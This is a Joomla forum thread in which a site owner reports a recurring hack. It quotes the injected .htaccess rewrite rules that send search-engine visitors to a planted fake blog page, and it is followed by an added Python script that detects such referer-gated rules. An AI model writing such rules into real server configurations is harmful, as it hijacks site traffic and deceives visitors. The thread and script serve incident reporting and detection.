Joomexplorer and Events list security issue - hacked .htaccess file - Joomla! Forum - community, help and support


Hi everyone,

I have had, I guess, an unusually unique experience that I wanted to share with fellow Joomla developers.

My setup:
GoDaddy shared hosting
Joomla 1.012 stable
PHP 4.3.11

I'm running the normal Joomla security safeguards recommended on this site.


We have an active education website. 2 weeks ago I got a call from a user who told me that when they went to Google, or any search engine, looked up our name, and clicked on the link, they arrived at our page, at our address, and the page had been turned black with weird blog links on it.

I figured that was impossible, checked it out, and sure enough, going to our domain name from a search engine:

http://www.asdasdf.com

would lead to a strange index page, a fake blog by an anonymous dude named John. It was fake, and not a redirection in the DNS host. An obvious hack of some sort.

Folks at GoDaddy told me meta-refresh on index page, send somewhere else, file in directory; I figured that's not solving the problem, and the Joomla site is pretty useless since it's set at root index.php. They had never seen the problem, and I don't blame them either: I have a Joomla site with a lot of components and hardcoded crap of my own. Hack component or else.

So I started taking things off, either uninstalling them, changing names or unpublishing them. I discovered the problem was the .htaccess file. It had grown from 7k to 93k... pretty darn big for a little text file. Suspicious, I checked it out, and sure enough it had amazing code in it that, upon a list of search engine referrals, would redirect the user to the fake blog page yet keep the domain name preserved... Below is the code inside the .htaccess file:


# a0b4df006e02184c60dbf503e71c87ad
rewriteengine on
rewritecond %{http_referer} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [nc]
rewritecond %{http_referer}  [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
rewritecond %{http_referer} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3a|%22)
rewritecond %{time_sec} <54
rewriterule ^.*$ /images/eventlist/events/icewoj/ex3/t.htm [l]
# a995d2cc661fa72452472e9554b5520c




-----------------------quite ingenious -------------------------


Removing the code makes it normal... however, the hack came back... within 24 hours the problem was there again...

Anyhow, I removed joomxplorer, which has root access to files, and that has solved the repeating problem of getting hacked... joomxplorer had been used to put the fake page deep inside the events list directory... I had changed passwords and it didn't help; I had to remove the joomxplorer component. So, I looooove joomxplorer, but can't use it right now since I'm being targeted by a repeating malicious hack... If anyone knows, please post here.

Dave
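
A defender-side check for the pattern in the block quoted above, as an added example that is not part of the original thread: it walks an .htaccess file, pairs each RewriteRule with the RewriteCond lines that gate it, and flags rules that only fire for visitors arriving from a search engine. The sample file is constructed, the engine list is shortened, the target path is a placeholder, and the whitespace-padding heuristic is an assumption prompted by the file's growth from 7k to 93k.

```python
import re

# Constructed sample modelled on the block quoted in the post: a normal rule
# followed by an injected, whitespace-padded chain (engine list shortened,
# target path is a placeholder).
PADDING = " " * 150
SAMPLE = (
    "# site rules\n"
    "RewriteEngine On\n"
    "RewriteCond %{REQUEST_FILENAME} !-f\n"
    "RewriteRule ^(.*)$ index.php [L]\n"
    + PADDING + "RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\\-]+\\.)*(google|msn|yahoo)\\. [NC]\n"
    + PADDING + "RewriteCond %{HTTP_REFERER} [?&](q|query)\\= [NC]\n"
    + PADDING + "RewriteRule ^.*$ /images/PLACEHOLDER/t.htm [L]\n"
)

ENGINES = re.compile(r"google|yahoo|msn|bing|yandex", re.I)
MAX_INDENT = 40  # assumption: more leading whitespace than this is padding


def scan_htaccess(text):
    """Flag RewriteRules gated on a search-engine Referer or hidden by padding."""
    findings, conds, padded = [], [], False
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()  # Apache directive names are case-insensitive
        if directive not in ("rewritecond", "rewriterule"):
            continue
        padded = padded or len(raw) - len(raw.lstrip()) > MAX_INDENT
        if directive == "rewritecond":
            conds.append(raw.strip())
            continue
        # A RewriteRule consumes every RewriteCond collected since the last rule.
        referer = [c for c in conds if "%{http_referer}" in c.lower()]
        reasons = []
        if any(ENGINES.search(c) for c in referer):
            reasons.append("search-engine referer condition")
        if padded:
            reasons.append("whitespace-padded directive")
        if reasons:
            target = parts[2] if len(parts) > 2 else ""
            findings.append({"line": lineno, "target": target, "reasons": reasons})
        conds, padded = [], False
    return findings


if __name__ == "__main__":
    for finding in scan_htaccess(SAMPLE):
        print(finding)
```

Running it from cron against the live .htaccess, together with a size or checksum comparison against a known-good copy, would surface a reinfection like the one described within the 24-hour window.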

I got hacked, and the hacker posted info in eventlist. Perhaps there is a bug here. I'm not using joomexplorer, so maybe that's not it. I'm using Expose gallery, which had security issues in the past. I suggest you back up, save your images, and do a fresh install of the latest release of Joomla, ver 1.014. Let me know if eventlist is the problem, since it's the common denominator between us, or if there is some other solution.

Good luck




